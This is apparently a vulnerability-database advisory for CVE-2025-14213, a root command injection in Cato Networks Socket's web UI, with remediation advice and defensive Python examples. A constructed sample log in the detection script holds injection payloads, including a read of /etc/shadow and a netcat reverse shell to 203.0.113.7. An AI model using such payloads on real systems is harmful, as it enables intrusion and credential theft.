CVE-2025-14213

EUVD-2025-209145 | Severity: HIGH (CVSS 4.0 base score 8.3)
Published 2026-03-31 | Vendor: Cato | GHSA-x58h-63cq-h3q4

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector: Network (AV:N)
Attack Complexity: Low (AC:L)
Attack Requirements: None (AT:N)
Privileges Required: High (PR:H)
User Interaction: None (UI:N)
Vulnerable System Impact: Confidentiality High (VC:H), Integrity Low (VI:L), Availability High (VA:H)
Subsequent System Impact: Confidentiality None (SC:N), Integrity None (SI:N), Availability High (SA:H)
Scope: not applicable (CVSS 4.0 has no Scope metric; the vulnerable/subsequent system split above replaces it)

Lifecycle Timeline

CVE Published: Mar 31, 2026 - 11:35 (nvd)
EUVD ID Assigned: Mar 31, 2026 - 12:15 (euvd), EUVD-2025-209145
Analysis Generated: Mar 31, 2026 - 12:15 (vuln.today)

Description

Cato Networks’ Socket versions prior to 25 contain a command injection vulnerability that allows an authenticated attacker with access to the Socket web interface (UI) to execute arbitrary operating system commands as the root user on the Socket’s internal system.

Analysis

Command injection in Cato Networks Socket (versions prior to 25) lets an authenticated user with access to the Socket web interface execute arbitrary commands as root on the underlying system. The CVSS 4.0 vector rates Privileges Required as High (PR:H), so an attacker first needs administrative-level credentials for the web UI; once those are in hand the attack is reachable over the network (AV:N), low complexity (AC:L) and needs no user interaction (UI:N), and the result is full compromise of the appliance. No public exploit had been identified at the time of analysis, but OS command injection (CWE-78) is a well-understood class that is straightforward to weaponize once credentials are obtained, whether by phishing, credential reuse or a compromised administrator workstation.

Technical Context

This is an OS command injection vulnerability (CWE-78) in the web-based management interface of Cato Networks Socket, the edge device for Cato's software-defined wide area network (SD-WAN) and SASE service. Command injection occurs when user-supplied input is placed, without adequate validation or escaping, into a string that a system shell then interprets, so shell metacharacters (;, |, &&, backticks, $(...)) let the attacker break out of the intended command and run arbitrary OS commands. Here the affected component runs as root, the highest privilege level on a Linux/Unix-based appliance, so a single injected command yields complete control of the device. The vulnerable surface is the Socket web UI administration panel, normally used for device configuration, monitoring and diagnostics. AV:N and AC:L mean the flaw is reachable from any authenticated session over the network with no special timing or preconditions; the exact injection point is not stated in the description, but web-UI command injection of this kind typically sits in a form field, API parameter or configuration value that ends up in a system()-style call without parameterization, so that location is an inference rather than a confirmed detail. Two caveats on the published vector: it rates vulnerable-system integrity impact as Low (VI:L) even though the description states root command execution, so plan response on the description rather than the sub-score; and it rates subsequent-system availability as High (SA:H), consistent with the Socket being the site's WAN edge, whose compromise can take down connectivity for everything behind it. The CPE identifier cpe:2.3:a:cato_networks:socket:*:*:*:*:*:*:*:* identifies the product line; the vulnerable version range (prior to 25) comes from the CVE description, not from the CPE string itself.
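The pattern described above, as an added example that is not Cato Networks code and is not derived from the real Socket flaw: a hypothetical appliance web-UI "ping" diagnostic whose host parameter is concatenated into a shell command, beside the hardened form that allow-list validates the value and passes an argv list so no shell ever parses it. The diagnostic, the host parameter and every function name are assumptions.

```python
"""Hypothetical SD-WAN web-UI diagnostics handler showing CWE-78 and its fix.

Added example; this is not Cato Networks code and nothing here is derived
from the real Socket flaw. The 'ping' diagnostic, the 'host' parameter and
the function names are assumptions chosen to resemble a typical appliance
web UI.
"""
import ipaddress
import re
import shlex
import subprocess
from typing import List


def build_ping_vulnerable(host: str) -> str:
    """Vulnerable pattern: untrusted input is concatenated into a shell
    command line. If this string reaches system() or subprocess with
    shell=True, a value such as "10.0.0.1; id" runs 'id' as the web
    server's user (root on the affected appliance)."""
    return f"ping -c 3 {host}"


# RFC 1123 hostname: labels of letters, digits and '-', each 1-63 chars,
# not starting or ending with '-', at most 253 chars in total. No shell
# metacharacter can pass, and no label can start with '-', so argv option
# injection is blocked as well.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_target(host: str) -> str:
    """Allow-list validation: accept an IPv4/IPv6 literal or a hostname,
    reject everything else. Raises ValueError on rejection."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"rejected diagnostic target: {host!r}")


def is_valid_target(host: str) -> bool:
    """Boolean wrapper around validate_target for callers that only need
    accept/reject."""
    try:
        validate_target(host)
        return True
    except ValueError:
        return False


def build_ping_safe(host: str) -> List[str]:
    """Hardened pattern: validate first, then build an argv list so no shell
    ever parses the value. A metacharacter would be an ordinary argument
    here, and cannot even reach this point past validate_target."""
    return ["ping", "-c", "3", validate_target(host)]


def build_ping_quoted(host: str) -> str:
    """Defence in depth if a shell string is unavoidable (e.g. a legacy
    script wrapper): still validate, then shell-quote the value."""
    return f"ping -c 3 {shlex.quote(validate_target(host))}"


def run_ping(host: str) -> subprocess.CompletedProcess:
    """Execute the hardened form without a shell."""
    return subprocess.run(
        build_ping_safe(host), shell=False, capture_output=True, text=True, timeout=15
    )
```

The allow-list is the real fix; shlex.quote alone would stop shell injection but not a value such as "-f" being taken as an option by the target binary, which is why validate_target rejects leading hyphens as well as metacharacters.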

Affected Products

Cato Networks Socket versions prior to version 25 are affected by this command injection vulnerability. The CPE identifier cpe:2.3:a:cato_networks:socket:*:*:*:*:*:*:*:* names the product line with wildcard version fields; the affected range (everything below the fixed release, 25) comes from the CVE description and vendor advisory, not from the CPE string. Socket is Cato Networks' SD-WAN edge appliance that connects branch offices and remote sites to the Cato SASE cloud platform. Organizations running Socket software in the 24.x series or earlier should consider themselves affected. The vendor advisory at https://support.catonetworks.com/hc/en-us/articles/33184937283357-CVE-2025-14213-Socket-WebUI-OS-Command-Injection is the authoritative source for version identification and impact scope.

Remediation

Upgrade Cato Networks Socket to version 25 or later, which remediates the command injection vulnerability in the web interface. Prioritize Socket devices whose web UI is reachable from the Internet or from untrusted networks, and those in high-security environments. Because exploitation requires authenticated access to the web UI (PR:H), the interim mitigations all aim at keeping that access out of an attacker's hands: restrict administrative web UI access to trusted management networks using firewall rules or VPN-only access, enforce strong multi-factor authentication for all administrative accounts, and review administrative access logs for injection attempts, in particular request parameters to the web UI that contain shell metacharacters (;, |, &, backticks, $(...)), URL-encoded or not, and administrative logins from unexpected source addresses. Rotate administrative credentials if any unauthorized access is suspected, and treat a device on which injection succeeded as fully compromised at root, since the attacker could have altered the system in ways a credential reset does not undo. Contact Cato Networks support for deployment-specific guidance. The full vendor advisory and update instructions are at https://support.catonetworks.com/hc/en-us/articles/33184937283357-CVE-2025-14213-Socket-WebUI-OS-Command-Injection. Monitor Cato's security bulletin page for any additional patches or detection guidance.
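The log review suggested above, as an added example that is not a Cato Networks tool and is not based on the Socket's actual log format: a scanner that URL-decodes the query parameters in combined-log-style access-log lines and flags values containing shell metacharacters or command-substitution forms. The log format, the /diag/ paths and every sample line are constructed for this illustration.

```python
"""Scan web-UI access-log lines for command-injection attempts in request
parameters.

Added example, not a Cato Networks tool and not based on Socket log formats.
The combined-log-style format, the /diag/ paths and every sample line are
constructed for illustration.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log: two benign requests and three injection attempts,
# URL-encoded as they would appear in a real access log.
SAMPLE_LOG = """\
10.1.1.5 - admin [31/Mar/2026:10:02:11 +0000] "GET /diag/ping?host=10.0.0.1 HTTP/1.1" 200 512
10.1.1.5 - admin [31/Mar/2026:10:03:40 +0000] "GET /diag/ping?host=10.0.0.1%3Bid HTTP/1.1" 200 640
203.0.113.7 - admin [31/Mar/2026:10:05:02 +0000] "GET /diag/ping?host=%24(cat%20/etc/shadow) HTTP/1.1" 200 900
10.1.1.9 - ops [31/Mar/2026:10:06:15 +0000] "GET /diag/traceroute?host=gw-1.example.net HTTP/1.1" 200 700
10.1.1.5 - admin [31/Mar/2026:10:07:30 +0000] "GET /diag/ping?host=127.0.0.1%7C%7Cnc%20-e%20/bin/sh%20203.0.113.7%204444 HTTP/1.1" 200 300
"""

# Common/combined log line: source, ident, user, timestamp, request, status.
_LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d+)'
)

# Shell metacharacters and command/process substitution forms that never
# belong in a hostname, IP or similar network-diagnostic parameter.
_SHELL_META_RE = re.compile(r"[;|&`\n\r]|\$\(|\$\{|<\(|>\(")


def scan_line(line: str) -> Optional[Dict[str, object]]:
    """Return a finding for one log line, or None if it looks clean.
    Parameters are URL-decoded before matching, so %3B, %7C and %24( are
    caught exactly like their literal forms."""
    m = _LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    params: List[Tuple[str, str]] = parse_qsl(parts.query, keep_blank_values=True)
    hits = [(k, v) for k, v in params if _SHELL_META_RE.search(v)]
    if not hits:
        return None
    return {
        "src": m.group("src"),
        "user": m.group("user"),
        "ts": m.group("ts"),
        "path": parts.path,
        "params": hits,
    }


def scan_log(text: str) -> List[Dict[str, object]]:
    """Scan a whole log and return findings in log order."""
    return [f for f in (scan_line(ln) for ln in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ts']} {finding['src']} user={finding['user']} "
              f"{finding['path']} {finding['params']}")
```

This only sees what the web server logs: GET query strings. Parameters sent in POST bodies or JSON API calls need the application or audit log instead, and a finding is only a lead, so correlate it with the source address (203.0.113.7 above is outside the management network) and with any unexpected child processes of the web server on the appliance.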

Priority Score

42 (scale: Low / Medium / High / Critical)
KEV: 0
EPSS: +0.3
CVSS: +42
POC: 0


CVE-2025-14213 vulnerability details – vuln.today
